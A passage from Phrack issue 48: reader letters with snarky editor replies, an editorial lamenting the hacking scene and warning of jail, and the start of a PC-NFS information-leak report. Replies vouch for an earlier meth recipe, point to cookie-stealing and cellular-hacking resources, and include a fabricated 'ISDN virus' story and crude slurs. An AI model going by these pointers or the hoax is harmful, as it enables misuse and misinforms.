  772. 3.    Hackman was a gob of shit.  Peter Shipley has come to know his true
  773. calling in life now (to wit: Webmaster).
  774.  
  775. 4.     The fangs make you look like a homo.  Maybe you are (nothing against
  776. them actually, just stating a fact).
  777.  
  778. Shipley, se7en, (ayoung, where's your piglet account?).  Get a fucking life.
  779. Maybe instead of contstantly going around "Searching for intelligent life"
  780. perhaps you should stay home and secure your own systems.  You are all owned,
  781. now don't you feel stupid?  You should.  You are.
  782.  
  783. DIS.ORG == DISORGANIZED.
  784.  
  785. -- galf@upt
  786.  
  787. [ This is almost funny.
  788.  
  789.   Notice I said, almost.
  790.  
  791.   You have to admit though, Shipley always comes with some damn fine
  792.   women in tow.  Oh the things I did in my mind to that blonde...
  793.  
  794.   Something tells me that the author of this forged message could use a lot
  795.   of Shipley hand-me-downs:  Women, contracts, references, etc... ]
  796.  
  797. -----------------------------------------------------------------------------
  798.  
  799.  
  800. Hey, I just watched the movie Hackers, and I was just curious to know if They
  801. used you and the LOD to models the characters in the movie after? Alot of the
  802. handles, and choice phrases they used  sounded awfully Farmiliar with what
  803. went on, or at least what the book said went on. 
  804.  
  805. Meds:}
  806.  
  807. [ Actually, meds, the screenwriter hung around with "MOD" and other people from
  808.   the New York hack scene and picked up some pointers, and then used
  809.   people like Dead Lord and Emmanuel Goldstein as technical assistants.
  810.  
  811.   Or something like that.
  812.  
  813.   Please, don't ever associate "LOD" with this piece of shit again.  :) ]
  814.  
  815. -----------------------------------------------------------------------------
  816.  
  817. A lot of people have read the article about Joe Engressia and his time in
  818. Memphis where he was arrested by the police and banned from his dream of
  819. working on phone lines.  Well, at the time when he was living on Union
  820. avenue, my mother was in charge of payroll, hiring and the like at a local
  821. switchboard. This was back in 1972 when the phone system was less of the
  822. fuqup it is today.  Well, a friend of my mother's taught Mr. Engressia how to
  823. cook and other related houshold things despite his handicap.  Shortly after
  824. or before this, (I am unsure) he was arrested by the police.  I think this
  825. was also about the time the interview was made.  Anyway, the local phone
  826. companies would not touch him, not even to give him service.  My mother,
  827. after talking with him decided to hire him as a phone consultant. (Her
  828. opinion of his was that "He was so brilliant, it was scary, I mean REALLY
  829. scary.")  She though he was a great "kid" (22 at the time) and was the best
  830. consultant that they had.  He worked there for three years before moving.
  831.  
  832.  The last my mother heard was that he was living in a Denver high rise
  833. working as a consultant to a corporation or something out there.  I only just
  834. started talking with my parents about this today, but I am sure that they
  835. will tell me more of him. 
  836.  
  837.    Oh, and my father was good friends of Joe too, he and Joe were Ham Radio
  838. operators here in Memphis and my father still phreaks on them so I am sure
  839. that Mr. Engressia does too.  Anyway, my father is teaching me how to hack,
  840. and my mother is teaching me how to phreak, but she only knows a little of
  841. outdated info and wants to get in touch with Joe.  If anyone, ANYONE has any
  842. information about Joe, or if somehow this article gets to Joe, please let me
  843. know at the following e-mail address:
  844. Kormed@aol.com. 
  845.  
  846.  
  847. [ We used to call Joe on conferences a long time ago.  I could probably
  848.   dig his contact information up, but I really doubt he'd appreciate his
  849.   number being published in Phrack.
  850.  
  851.   Hell, if your parents are teaching you how to hack & phreak, then certainly
  852.   they can find Joe.  He was always listed in Directory Assistance when
  853.   we tracked him down years back.
  854.  
  855.   Have you even really looked for him?  ]
  856.  
  857.  
  858. -----------------------------------------------------------------------------
  859.  
  860. quick question For Bloodaxe.
  861.  
  862. Ok, I know you probably get this Alot,but I just have to ask?...
  863.  
  864. Did you Really Date Christina Applegate?
  865.  
  866. had to ask,
  867.  
  868. [ Man, now that is a rumor that I would love to have started myself.
  869.   No.  Never dated her, never met her, never talked to her, never
  870.   had any contact whatsoever.  Spent some time holding up some of her
  871.   posters with one hand, but that's about it. ]
  872.  
  873. -----------------------------------------------------------------------------
  874.  
  875. do you have any info on stealing magic cookies ??
  876.  
  877.  
  878. [ No, but I can trade you these magic beans for your cow.  If you plant
  879.   them they will grow high into the sky, towards the castle in the clouds
  880.   where the giant lives with the talking harp and the goose that lays the
  881.   golden eggs.
  882.  
  883.   Go read some of the WWW Security Lists, if you're talking about what
  884.   I think you are.  There are also javascript routines that collect
  885.   navigator cookies from clients hitting your page.  After briefly looking
  886.   around, I can't find the specific sites to snarf them from.  Go do a
  887.   webcrawler search for WWW security or javascript security. ]
  888.  
  889. -----------------------------------------------------------------------------
  890.  
  891. Dear Phracks - I'm a Free Journalist from Germany and I'm going to write
  892. an articel about ISDN and the possible danger which might happen to a 
  893. company etc. getting hacked by some agnets, spies etc. from other 
  894. countries. So I'm looking for indos about ISDN-Viruses, Hackers and
  895. background infos.
  896.  
  897. Can you help me?
  898.  
  899. [ Wow, a "Free Journalist."  I thought that pesky national socialist party
  900.   imprisoned all you guys.
  901.  
  902.   ISDN Viruses are quite possibly the worst thing to happen to computing
  903.   since the creation of the Cellular Trojan Horse.  Basically, these viruses
  904.   travel over the wires using the X.224 transport protocol, and seize the
  905.   D channel using Q.931.  All SS7 data sent over the D channel is quickly
  906.   compromized and re-routed to different signal transfer points, causing
  907.   massive ANI Failure over the entire routing mesh.
  908.  
  909.   Rumor has it that the Internet Liberation Front was behind these viruses
  910.   with heavy investement coming from the German Bundesnachrichtendienst's
  911.   Project Rahab.  These hackers were paid with AT&T calling cards encoded
  912.   with a polymorphic encryption scheme, and cocaine.
  913.  
  914.   You can quote me on this. ]
  915.  
  916. -----------------------------------------------------------------------------
  917.  
  918. Well, i wanna make an offer, and a nice deal.
  919. i am n editor in an H/P/C magazine of HFA ( universal H/P/C 
  920. group..)
  921. well, what i wanna offer is a joining both of the papers 
  922. 2gether, OR! u want more subscribes, we'll publish ya,
  923. but adding 1 article from ya'r paper, saying from where it is.
  924. so, if we can make this deal, contact me asap!
  925. 10x.
  926.  
  927. [ Let me see if I understand this, your "universal H/P/C group" has
  928.   a magazine, and wants to do "Phrack" the great honor of merging
  929.   with us, or printing our articles?  Wow.  What a deal.  You mean
  930.   by linking up with you guys, we will hit a greater audience
  931.   "universally?"
  932.  
  933.   So, merging our roughly 10,000 direct email subscribers, and a roughly
  934.   75,000 more WWW or misc. readers, adding in your readers, that should
  935.   bring us up to 85,001 readers!  Universally!  FAN-FUCKING-TASTIC!
  936.  
  937.   Are there so many rocks for you people to crawl out from under?
  938.   Sheesh! ]
  939.  
  940.  
  941. -----------------------------------------------------------------------------
  942.  
  943. Hello,
  944.  
  945.  
  946. I have a need for a network sniffer.  Specifically, one that will
  947. sniff IEEE-802.3 packets and TCP/IP packets.  Any leads?
  948.  
  949.  
  950. [ Well, gee, are there network sniffers that won't?
  951.  
  952.   Go do an archie search for tcpdump. ]
  953.  
  954. -----------------------------------------------------------------------------
  955.  
  956. I was just strolling by you page: http://freeside.com/phrack.html,
  957. and found my link "Showgirl Video" (link to vegaslive.com).
  958.  
  959. I am the creator and webmaster for the site. If I can ever be
  960. of assistance to you let me know.
  961.  
  962. We are one of the few sites in the world that has a live stage and
  963. live 1 on 1 conferencing in one place.
  964.  
  965. john...
  966.  
  967. [ Ya know, every time I'm in Vegas I make it out to Showgirl Video with
  968.   a bucket of quarters and a healthy dose of bad intent.  I have to
  969.   congratulate you guys for going on-line.  I love it when two of
  970.   my favorite things come together (smut and computers).
  971.  
  972.   Unfortunately, The Vegaslive site is kind of pricey.  You guys seriously
  973.   need a flat fee.  I suggest you look at a SUPURB site:
  974.   http://www.peepshow.com
  975.  
  976.   That place has a flat fee, all you can eat pricing structure, the way
  977.   God meant it to be.  Take note, and follow suit. ]
  978.  
  979.  
  980. -----------------------------------------------------------------------------
  981.  
  982. I have a Mitsubishi MT9 (MT-1097FOR6A) ..I program the NAM with the 
  983. passw: 2697435 ...I need the passw to have access to SCAN or TAC 
  984. function ...please, help me!
  985.  
  986. Thank
  987. Regards
  988.  
  989. [NCG]
  990.  
  991. [ I'm not familiar with that phone, but I'd start off looking through
  992.   Dr. Who's archive of cellular info at:
  993.  
  994.   http://www.l0pht.com/radiophone
  995.  
  996.   If what you are looking for isn't there, there might be a link to
  997.   somewhere that has it. ]
  998.  
  999. -----------------------------------------------------------------------------
  1000.  
  1001. my name is azreal! I am also known as the angel of death.  why did you sell
  1002. out to the feds back when you running comsec.  i think phiber optick was a
  1003. great guy and i would have been glad to work with a legend.  do you know his
  1004. e-mail adress
  1005. azreal
  1006.  
  1007. [ Azrael?  The Angel of Death?  I thought Azrael was Gargamel's annoying cat.
  1008.  
  1009.   But to answer your question, I sold out to the man ages ago for money.
  1010.   Pure and simple.  Once you hit puberty, you might have a need for cash.
  1011.   Once mommie sends you off to college, you might need it even more.  And
  1012.   in the distant future, when you get out on your own, you will really
  1013.   know.
  1014.  
  1015.   Yes, phiber is swell.  There have been good pictures of him in many
  1016.   national magazines.  Try not to get the pages stuck together.
  1017.  
  1018.   And, yes, I do know his email address.  Thanks for asking! ]
  1019.  
  1020. -----------------------------------------------------------------------------
  1021.  
  1022. From: prodigy.com (MR MARK P DOLESH)
  1023.  
  1024. How do you hack?
  1025.  
  1026. [ Very carefully. ]
  1027.  
  1028. -----------------------------------------------------------------------------
  1029.  
  1030. Did you ever write a edition that deals with breaking the screensavers
  1031. code?  If so which one?  How about breking the Win95 password.  You know
  1032. the one that allows you into Win95?
  1033.  
  1034. [ We pass all articles about breaking Windows Screen Savers on to
  1035.   the more technical forum at 2600 magazine.
  1036.  
  1037.   To disable the Win95 password, install Linux. ]
  1038.  
  1039. -----------------------------------------------------------------------------
  1040.  
  1041. A phriend of mine showed me your sight a few days ago at his house...I 
  1042. thought it was pretty cool.  I dloaded a few issues and stuff to check 
  1043. out...I haven't been on the internet to long so I'm still trying to phined 
  1044. more stuff that interest me,  and I would like to set up my own page like 
  1045. that but my account is thru the school...Is there anyway around that?  So 
  1046. it can be like border line legal?  How underground can one go???  If you 
  1047. still have the file on where the line is please send them...Thanks.
  1048.  
  1049. [ Your account is through your school, but you are looking for a way around
  1050.   that?  Hmmm...let me see.  I'm just going to throw out something wild
  1051.   and crazy, but, what the hell:  Maybe, get another account through
  1052.   another Internet provider?  I know, it's just too outlandish.  Forgive
  1053.   me for being so zany.
  1054.  
  1055.   How underground can you really go?  I used to have that file you are looking
  1056.   for, but I was so underground at the time, it got soiled with mud and
  1057.   disintegrated, eventually polluting the water table, and was ultimately
  1058.   drank by the city of Pasadena, Texas. ]
  1059.  
  1060. -----------------------------------------------------------------------------
  1061.  
  1062. In regards to volume one ,issue four , Phile #8 of 11 ...
  1063. This shit has got to be a joke , I tryed to make some and 
  1064. Was a great dissapointment ????
  1065.  
  1066. [ The meth recipe works just fine.  Obviously you DIDN'T try to make it.
  1067.   If you feel like a REAL MORON, look at the cat recipe in the line noise
  1068.   section of this issue.  Stay up for a week, go into deep amphetamine
  1069.   psychosis and die!  Woo Woo! ]
  1070.  
  1071. -----------------------------------------------------------------------------
  1072.  
  1073. I ve tried to locate these guys who have Black book for cracking 
  1074. passwords in major software and some games as well.They go by the Names 
  1075. of Jolly Reaper and Maugan Ra aka Manix.Iam doc X from London (not a 
  1076. pig!!!) if U happpen to know these doodez let us know.TA from GB
  1077.  
  1078. [ Perhaps you have Phrack confused with something having to do with
  1079.   pirated software.  I'd ask that question in a posting to the USENET
  1080.   group alt.warez or on the IRC #warez channels. ]
  1081.  
  1082. -----------------------------------------------------------------------------
  1083.  
  1084. Eric,
  1085.    i have been searching the internet for some kind of script that
  1086. will subscribe a certain email address to a shitload of
  1087. mailing lists...i have heard of such a thing.
  1088. what im lacking is that keyword to search for such as:
  1089.  
  1090.    bombard
  1091.    attack
  1092.    flash
  1093.  
  1094. what is the technical term for this kind of attack?
  1095. or better yet, do you know where to get a hold of such a script.
  1096. im not familiar with mailing lists and id rather not spend the time
  1097. researching the topic...but i need vengeance quickly :-)
  1098.  
  1099. any help appreciated,
  1100. -roger
  1101.  
  1102. [ The name for this type of attack?  Uh, an email bomb?
  1103.  
  1104.   But let's take a closer look at your mail:
  1105.  
  1106.   "id rather not spend the time researching the topic...but I need vengeance
  1107.    quickly"
  1108.  
  1109.   I'm not going to be your fucking research assistant, or your accomplice.
  1110.   If you can't figure out how to look through our back issues to find any of
  1111.   the tons of fake mailers we've printed, or figure out how to automate them
  1112.   using shell script, then you don't deserve to live, much less
  1113.   get your speedy vengeance.
  1114.  
  1115.   Couldn't you even come up with a NON-LAME way to get back at someone?  Hell,
  1116.   even rewriting their .login to say "exit" or something silly like that is
  1117.   more clever, and less cliche, than flooding their inbox. ]
  1118.  
  1119. -----------------------------------------------------------------------------
  1120.  
  1121.     The art of " information manipulation " has possessed my virgin soul ! I
  1122. turned into a fuckin' 2-year old (drool and all) when experiencing the free
  1123. local call system involving a paperclip . All I've been thinking is hack,
  1124. haCK, HACK ! I'm still drenched behind the ears but I'm a patient, turbo
  1125. learner (whatever the hell that means) !
  1126.  
  1127.      Here's the problem: I possess some info that could make you smile so
  1128. big, that your sphinctor would unwrinkle. I would like to experiment, if you
  1129. will . Perhaps, dabble with this stuff , but I am very uneducated in raping
  1130. mainframes. This could be a major wood producer 
  1131. because my EX works at this establishment .
  1132.  
  1133.      I need a trustworthy pro who possesses a plethora of tasty tactics . Whic
  1134. h way to the Dagobah System.....I seek YODA !!
  1135.                                                       
  1136. [ Drooling 2-year old.
  1137.  
  1138.   Very uneducated in raping mainframes.
  1139.  
  1140.   Major wood producer.
  1141.  
  1142.   Well, gee, I'm sure your info would make my "sphinctor" unwrinkle, but I'm
  1143.   wearing a new pair of jeans, so I guess I'll have to take a rain check.
  1144.  
  1145.   God bless AOL for bringing the internet to the masses! ]
  1146.  
  1147.  
  1148. -----------------------------------------------------------------------------
  1149.  
  1150. i want to be added to your list. and could you send me unziped hacking 
  1151. software or can you tell me how to unzip softwarre nd a beginners guide 
  1152. to hacking. i would appreciate it i want to begin fun new field of 
  1153. hacking thank you
  1154.  
  1155. [ You want to learn all about hacking, but you don't know how to unzip
  1156.   files?
  1157.  
  1158.   Crawl before you run, Kwai Chang. ]
  1159.  
  1160. -----------------------------------------------------------------------------
  1161.  
  1162. VA'CH CO' TAI
  1163.  
  1164. Anh Ta'm ddi du li.ch xa, ngu? ta.i mo^.t kha'ch sa.n.  DDa~ ma^'y 
  1165. tie^'ng ddo^`ng ho^` ro^`i anh ngu? kho^ng ddu*o*.c vi` tie^'ng cu*o*`i 
  1166. no'i huye^n na'o tu*` pho`ng be^n ca.nh vo.ng sang.  Ro~ ra`ng la` ho. 
  1167. ddang dda'nh ba`i, sa't pha.t nhau a(n thua lo*'n.
  1168.  
  1169. Ra'ng nhi.n cho to*'i 3 gio*` sa'ng va^~n cu*' tra(`n tro.c hoa`i, anh 
  1170. Ta'm chi.u he^'t no^?i, be`n go~ nhe. va`o va'ch dde^? nha('c khe'o 
  1171. pho`ng be^n ca.nh.
  1172.  
  1173. Anh Ta'm vu*`a go~ xong la^.p tu*'c anh nghe mo^.t gio.ng tenor he't le^n 
  1174. tu*` pho`ng be^n:
  1175.  
  1176. -  Tro*`i o*i!  Co' bie^'t ba^y gio*` la` ma^'y gio*` sa'ng ro^`i 
  1177.    kho^ng?  O*? ddo' ma` ddo'ng ddinh treo hi`nh!
  1178.  
  1179. -  ?!?!?
  1180.  
  1181. [Uh, let's see...No Boom Boom with soul brother.  Soul Brother too beaucoup.
  1182.  
  1183.  Ddi Ma'o.]
  1184.  
  1185. -----------------------------------------------------------------------------
  1186.  
  1187.  
  1188. Hola me gustaria tener mucha informacion de lo que ustedes hacen sobre 
  1189. todo de como lo hacen. Es decir que me manden informacion de los secretos 
  1190. de los sistemas operativos de internet  de todo lo que me puedan mandar.
  1191.   yo soy universitario, y me gusta todo lo relacionado con redes.
  1192.  
  1193. Muchos saludos.
  1194. Contestenme.
  1195.  
  1196.  
  1197. [ What is this, International Day?
  1198.  
  1199.   !Si quieras mucha informacion, LEA MUCHOS LIBROS!  !DIOS MIO!  !No estoy
  1200.   el maestro del mundo!  Ehehe, esta fue solomente una chiste.  No esta
  1201.   nunca libros en espanol sobre <<computer security>>.  Que lastima.
  1202.  
  1203.   If you want to learn, start with english...then go buy the entire O'Reilly
  1204.   Yellow series and Blue series.  That will get you started learning
  1205.   "los secretos de los sistemas operativos de internet." ]
  1206.  
  1207. -----------------------------------------------------------------------------
  1208.  
  1209. From: "Erik K. Escobar"
  1210. Subject: Apology
  1211.  
  1212. This letter is to be forwared to the newsgroup io.general by madmagic, in 
  1213. care of Mr. Escobar. 
  1214.  
  1215. I would like to send a public apology to Internex Online for the 
  1216. treatment I have given the staff and users of this system.  I threw 
  1217. around some threats and words that can incriminate me, and realized that 
  1218. it was a stupid idea on my behalf.  In the last week or so with the 
  1219. negative attention I have gotten, I got to know the IO/ICAN staff a bit 
  1220. better and everything in good standing. Me and Internex Online are now 
  1221. even and there will be no retaliation or sour words from me. I just want 
  1222. everything to go back to the norm.
  1223.  
  1224. Erik
  1225.  
  1226. [ * AND THEN * ]
  1227.  
  1228.  
  1229. From: "Erik K. Escobar"
  1230. Subject: Shit
  1231.  
  1232. As my understanding, A letter of apology under my name was redistributed 
  1233. around within my mailing list and whatever.  As some of you know, myself 
  1234. and Zencor have been having problems with Internex in the past and near 
  1235. the middle of this week, I got into a large battle with was ACC, ICAN, 
  1236. and Internex Online -vs- Me.  It is stupid to get into an argument with 
  1237. that many corporations, and a few words and threats were thrown, they 
  1238. locked my account.  I wrote a letter in response of that and they 
  1239. proceded to lock other Zencor staff accounts and hack our web site. Also 
  1240. they posted the letter in the news groups and whatever.  They eventually 
  1241. decided to charge me and whatever, and to save me time outta the courts 
  1242. and crap like that I made an apology for the threats, seeing that they 
  1243. could incriminate me.  Internex has done wrong and I probably won't be 
  1244. seeing alot of apologies coming my way. If they didn't have certain info 
  1245. about me..they could have me very well laughing at them but that is not 
  1246. the case.
  1247.  
  1248. Erik
  1249. Lord Kaotik
  1250. [ ZENC0R TECHN0L0GIES ]
  1251.  
  1252.  
  1253. [ Can you say, LAME? ]
  1254.  
  1255. -----------------------------------------------------------------------------
  1256.  
  1257. Been trying to locate for some time the file, plusmap.txt that used to be on
  1258. the phrack bbs (716-871-1915).  This file outlined information regarding the
  1259. videopal in the videocipher II plus satellite decoder module.  Any idea where
  1260. I might find this file?
  1261.  
  1262.  
  1263. [ I didn't know there was a "phrack" bbs.  <Sigh>
  1264.  
  1265.   In any case, I would look for information regarding this on the following
  1266.   sites:
  1267.  
  1268.   http://www.scramblingnews.com
  1269.   http://www.hackerscatalog.com
  1270.   http://ireland.iol.ie/~kooltek/welcome.html
  1271.  
  1272.   Satellite Watch BBS : 517-685-2451
  1273.  
  1274.   This ought to get you in the right direction. ]
  1275.  
  1276. -----------------------------------------------------------------------------
  1277.  
  1278. Hi,
  1279.  
  1280. Just a quick note to tell you about the Hawaii Education Literacy Project -
  1281. a non-profit organization - and our efforts to promote literacy by making
  1282. electronic text easier and more enjoyable to read.  Given that we're both in
  1283. the reading biz, I thought you might be interested.
  1284.  
  1285. ReadToMe, our first program, reads aloud any form of electronic text,
  1286. including Web pages, and is free to anyone who wishes to use it.  
  1287.  
  1288. The "Web Designers" section of our home page tells you how your pages can
  1289. literally speak to your audience.  Actually, all you need to do to make your
  1290. pages audible is to add the following html code:
  1291.  
  1292. <P><A HREF="http://www.pixi.com/~reader1/readweb.bok">Hear
  1293. This Page!</A> Requires ReadToMe Software... Don't got it? <A
  1294. HREF="http://www.pixi.com/~reader1">GET IT FREE!</A>
  1295. </P>
  1296.  
  1297. A beta test version of the program can be obtained from
  1298. http://www.pixi.com/~reader1.  I encourage you and your readers to download
  1299. a copy and take it for a spin.  
  1300.  
  1301. Thank you for your time,
  1302.  
  1303. Rob Hanson
  1304. rhanson@freeway.net
  1305. Hawaii Education Literacy Project
  1306.  
  1307.  
  1308. [ Honestly, I don't know if this is a spam to a list of magazine people, or
  1309.   really a phrack reader.  I have this thing about jumk email, and the joy of
  1310.   offering that info to our thousands of bored hacker readers looking for
  1311.   an excuse to fuck with some system.
  1312.  
  1313.   I'll let them decide if this was a spam.  Thanks, Rob. ]
  1314.  
  1315. -----------------------------------------------------------------------------
  1316.  
  1317. ********************************
  1318. SYNTHETIC PLEASURES  opens in the US theaters
  1319. ********************************
  1320. save the date, spread the word. forgive us if you got this before.
  1321.  
  1322. -----------------------------------------------------------------------
  1323. eerily memorable is SYNTHETIC PLEASURES, a trippy, provocative tour through
  1324. the perfectly artificial worlds of cyberspace, plastic surgery,
  1325. mind-altering chemicals and controlled, man-made environments that
  1326. questions whether the natural world is redundant, or even necessary. those
  1327. who see it will want to pinch themselves when it's over.
  1328. (janet maslin- The New York Times)
  1329. ------------------------------------------------------------------------
  1330.  
  1331. for further info contact:
  1332. caipirinha@caipirinha.com
  1333. http://www.syntheticpleasures.com
  1334.  
  1335. first opening dates:
  1336.  
  1337. Aug 29 Los Angeles, CA- Nuart Theatre
  1338. Aug 30 San Francisco, CA- Castro Theatre
  1339. Aug 30 Berkeley, CA- UC Theatre
  1340. Aug 30 San Jose, CA- Towne Theatre
  1341. Aug 30 Palo Alto, CA- Aquarius Theatre
  1342. Aug 30 Portland, OR- Cinema 21
  1343. Sept 13 San Diego, CA- Ken Theatre
  1344. Sept 13 NYC, NY- Cinema Village
  1345. Sept 13 NYC, NY- City Cinemas
  1346. Sept 13 Larkspur, CA- Larkspur Theatre
  1347. Sept 20 Boston, MA- Kendall Square Theater
  1348. Sept 20 Cleveland, OH- Cedar Lee
  1349. Sept 20 Philadelphia, PA- Ritz
  1350. Sept 22 Vorheess, NJ- Ritz 12
  1351. Sept 27 Austin, TX- Dobie Theater
  1352. Sept 27 New Haven, CT- York Theatre
  1353. Sept 27 Pittsburgh,PA- Rex
  1354. Oct 4 Washington, DC- Key Cinema
  1355. Oct 11 Providence, RI- Avon Theater
  1356. Oct 11 Kansas City, MO- Tivoli
  1357. Oct 11  Baltimore,MD - Charles Theatre
  1358. Oct 18  Waterville MA- Railroad Square
  1359. Oct 18  Durham,NC - Carolina Theater
  1360. Oct 18 Raleigh, NC - Colony Theater
  1361. Oct 18 Chapel Hill,NC -The Chelsea Theatre
  1362. Oct 25 Seattle, WA- Varsity
  1363. Nov 8 Ft Lauderdale FL- Fox Sunrise
  1364. Nov 15 Gainesville,FL - Plaza Theater
  1365. Nov 16 Hanover, NH- Dartmouth Theater
  1366. Nov 22 Miami, FL- Alliance
  1367. Nov 25,29,30 Tampa FL - Tampa Theatre
  1368. Dec 13 Chicago, IL - Music Box
  1369.  
  1370.  
  1371. [ THIS WAS DEFINATELY A SPAM.
  1372.  
  1373.   I wonder what lovely cgi-bin holes that WWW site is sporting.
  1374.  
  1375.   But wait, maybe they just want some k-rad cyber-press like
  1376.   MGM got for the "Hackers" WWW page.  Oh man, what a dilemma.
  1377.   To hack, or not to hack.  Assholes. ]
  1378.  
  1379.  
  1380. -----------------------------------------------------------------------------
  1381.  
  1382.  
  1383.                               ==Phrack Magazine==
  1384.  
  1385.                    Volume Seven, Issue Forty-Eight, File 2a of 18
  1386.  
  1387.                                 Phrack Editorial
  1388.                                        by
  1389.                                   Erik Bloodaxe
  1390.  
  1391.  
  1392. This may very well be my last Phrack editorial, since I'm no longer going to
  1393. fill the day-to-day role of editor, so I figure I ought to close out my
  1394. crusade to piss everyone off.
  1395.  
  1396. I don't like most of you people.  The hacking subculture has become a
  1397. mockery of its past self.  People might argue that the community has
  1398. "evolved" or "grown" somehow, but that is utter crap.  The community
  1399. has degenerated.  It has become a media-fueled farce.  The act of intellectual
  1400. discovery that hacking once represented has now been replaced by one of
  1401. greed, self-aggrandization and misplaced post-adolescent angst.
  1402.  
  1403. DefCon IV epitomized this change in such amazing detail, that I can only hope
  1404. to find words to describe it adequately.  Imagine the bastard offspring
  1405. of Lollapalooza and a Star Trek convention.  Imagine 300+ people out of their
  1406. homes, and away from Mother's watchful eye for the first time in their
  1407. pathetic lives.  Imagine those same people with the ego of Rush Limbaugh and
  1408. the social skills of Jeffrey Dahmer, armed with laptops loaded with programs
  1409. they can't use, and talking at length to reporters about techniques they
  1410. don't understand.  Welcome to DefCon.
  1411.  
  1412. If I were to judge the health of the community by the turnout of this
  1413. conference, my prognosis would be "terminally ill."
  1414.  
  1415. It would seem that "hacking" has become the next logical step for many people
  1416. looking for an outlet to strike back at "something."  "Well, gee, I've already
  1417. pierced every available piece of skin on my body and dyed my hair blue...what
  1418. on earth can I do now to shock my parents?  I know!  I'll break some federal
  1419. laws, and maybe get my name in the paper!  THAT WOULD BE COOL!  It'll be
  1420. just like that movie!"
  1421.  
  1422. I hate to burst everyone's bubble, but you are so fucked up.
  1423.  
  1424. In this day and age, you really don't have to do anything illegal to be
  1425. a hacker.  It is well within the reach of everyone to learn more, and use
  1426. more powerful computers legally than any of us from the late 70's and early
  1427. 80's ever dreamed.  Way back then, it was ALL about learning how to use these
  1428. crazy things called computers.  There were hundreds of different types of
  1429. systems, hundreds of different networks, and everyone was starting from ground
  1430. zero.  There were no public means of access; there were no books in stores or
  1431. library shelves espousing arcane command syntaxes; there were no classes
  1432. available to the layperson.  We were locked out.
  1433.  
  1434. Faced with these obstacles, normal, intelligent, law-abiding adolescents from
  1435. around the globe found themselves attempting to gain access to these
  1436. fascinating machines through whatever means possible.  There simply was
  1437. no other way.  There were no laws, and yet everyone knew it wasn't strictly
  1438. kosher behavior.  This fact added a cheap rush to the actual break-in, but
  1439. the main drive was still simply to learn.
  1440.  
  1441. Now, with the majority of operating systems being UNIX-based, and the majority
  1442. of networks being TCP/IP-based the amount of knowledge to be gathered has
  1443. shrunk considerably.  With the incredibly low prices of powerful personal
  1444. computers, and the free availablity of complex operating systems, the need
  1445. to break into remote systems in order to learn has been removed.  The only
  1446. possible needs being met by remote intrusions would be a means to gather
  1447. specific information to be sold, or that base psychological rush from doing
  1448. something forbidden and getting away with it.  Chasing any high only leads
  1449. to a serious crash, and in the case of breaking into computers, that
  1450. only leads to jail.
  1451.  
  1452. There is absolutely nothing cool about going to jail.  I know too many
  1453. people who are currently in jail, who have been in jail, and some who are
  1454. on their way to jail.  Trust me on this, people.  You will not be
  1455. respected by anyone if you act rashly, do something careless and
  1456. end up being convicted of several felonies.  In fact, all of your "friends,"
  1457. (those who didn't get busted along with you, and turn state's evidence against
  1458. you) will just think you were a moron for being so sloppy...until they also
  1459. get nailed.
  1460.  
  1461. Get raided and you will almost certainly spend time in jail.  Even once you
  1462. are released, you will lose your passport and your ability to travel freely,
  1463. you will lose your ability to do business in classified environments, you
  1464. will become unemployable by most companies, you may even lose your rights to
  1465. use computer or networking equipment for years.  Is is still worth it?
  1466.  
  1467. I break into computers for a living, and I love my job.  However, I don't
  1468. kid myself about just how lucky I really am.  Don't fool yourselves into
  1469. thinking that it was easy for me to achieve this, or that anyone else can
  1470. easily slip into such a role.  Staking out a claim in the information security
  1471. industry is a continual battle for a hacker.  Your past will constantly
  1472. stand in your way, especially if you try to hide it and lie to everyone.
  1473. (Read the recent Forbes ASAP article and spot the hacker from Garrison
  1474. Associates lying about his past, although he was raided for running
  1475. the Scantronics Publications BBS in San Deigo just a few short years ago.
  1476. Shame on you Kludge.)
  1477.  
  1478. I've never lied about anything, so that can't be held over my head.  I've
  1479. never been convicted of anything either, although I came closer to jail
  1480. than hopefully any of you will ever experience.  The ONLY reason I avoided
  1481. prison was the fact that law enforcement was not prepared to deal with
  1482. that type of crime.  Now, I've taught many of those same law enforcement
  1483. agencies about the nature of computer crimes.  They are all learning and
  1484. not making the same mistakes any more.
  1485.  
  1486. At the same time, the technology to protect against intrusions has increased
  1487. dramatically.  Technology now exists that will not only stop attacks, but
  1488. identify the attack methodology, the location of the attacker, and take
  1489. appropriate countermeasures all in real-time.  The company I work for makes it.
  1490. I've always said that anything that can stop me will stop almost anyone,
  1491. even through I'm not anywhere close to the world's best.  There simply
  1492. aren't that many things to monitor, once you know what to look for.
  1493.  
  1494. The rewards have diminished and the risks have increased.
  1495.  
  1496. Hacking is not about crime.  You don't need to be a criminal to be a hacker.
  1497. Hanging out with hackers doen't make you a hacker any more than hanging
  1498. out in a hospital makes you a doctor.  Wearing the t-shirt doesn't
  1499. increase your intelligence or social standing.  Being cool doesn't mean
  1500. treating everyone like shit, or pretending that you know more than everyone
  1501. around you.
  1502.  
  1503. Of course, I'm just a bitter old sell-out living in the past, so
  1504. what do I know?
  1505.  
  1506. Well, what I do know, is that even though I'm one of the few screaming about
  1507. how fucked up and un-fun everything has become, I'm not alone in my disgust.
  1508. There are a bunch of us who have reached the conclusion that the "scene"
  1509. is not worth supporting; that the cons are not worth attending; that the
  1510. new influx of would-be hackers is not worth mentoring.  Maybe a lot of us
  1511. have finally grown up.
  1512.  
  1513. In response, expect a great many to suddenly disappear from the cons.  We'll be
  1514. doing our own thing, drinking a few cool drinks someplace warm, and reflecting
  1515. on the collective pasts we've all drawn from, and how the lack of that
  1516. developmental stage has ruined the newer generations.  So those of us
  1517. with that shared frame of reference will continue to meet, enjoy each
  1518. other's company, swap stock tips in the same breath as operating system
  1519. flaws, and dream about the future of security.
  1520.  
  1521. You're probably not invited.
  1522.  
  1523. -----------------------------------------------------------------------------
  1524.                          ==Phrack Magazine==
  1525.  
  1526.               Volume Seven, Issue Forty-Eight, File 3 of 18
  1527.  
  1528.  
  1529.                            //   //  /\   //   ====
  1530.                           //   //  //\\ //   ====
  1531.                          ==== //  //  \\/   ====
  1532.  
  1533.                      /\   //  // \\    //  /===   ====
  1534.                     //\\ //  //   //  //   \=\   ====
  1535.                    //  \\/    \\ //  //   ===/  ====
  1536.  
  1537.                                 Part I
  1538.  
  1539. ------------------------------------------------------------------------------
  1540.  
  1541. PC-NFS Bug
  1542.  
  1543.  
  1544. I have found a nice little security hole in PC-NFS version 5.x.  If you 
  1545. ping a PC-NFS user with a packet size of between 1450 to 1480, the 
  1546. PC'ís ICMP reply packet will divulge:
  1547.  
  1548.     o The hostname of the PC
  1549.     o The hostname of the PC'ís authentication server
